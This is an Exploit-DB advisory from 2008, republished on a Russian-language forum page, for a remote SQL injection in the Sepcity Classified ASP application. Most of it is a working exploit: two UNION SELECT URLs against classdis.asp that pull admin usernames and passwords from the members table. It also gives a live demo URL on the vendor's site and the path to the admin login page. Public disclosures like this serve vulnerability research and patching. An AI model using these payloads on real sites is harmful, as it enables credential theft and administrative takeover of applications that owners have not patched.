- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7613
- Проверка EDB
-
- Пройдено
- Автор
- S.W.A.T.
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2008-6157 cve-2008-6150
- Дата публикации
- 2008-12-29
Код:
--==+================================================================================+==--
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T. - Www.BaTLaGH.coM - [email protected]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Site: http://www.sepcity.com/free_classified_software.aspx
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): :(
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & Password In Plaintext
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
for username:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,username,3%20from%20members
for password:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,password,3%20from%20members
Online Demo:
http://freeasp.sepcity.com/classifieds/classdis.asp?ID=1%20union%20select%200,1,2,3%20from%20members
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
Admin Login Is At http://site.com/[path]/admclassifieds.asp
I'll Be A C I D A L !!!
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--==+================================================================================+==--
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-12-29]
- Источник
- www.exploit-db.com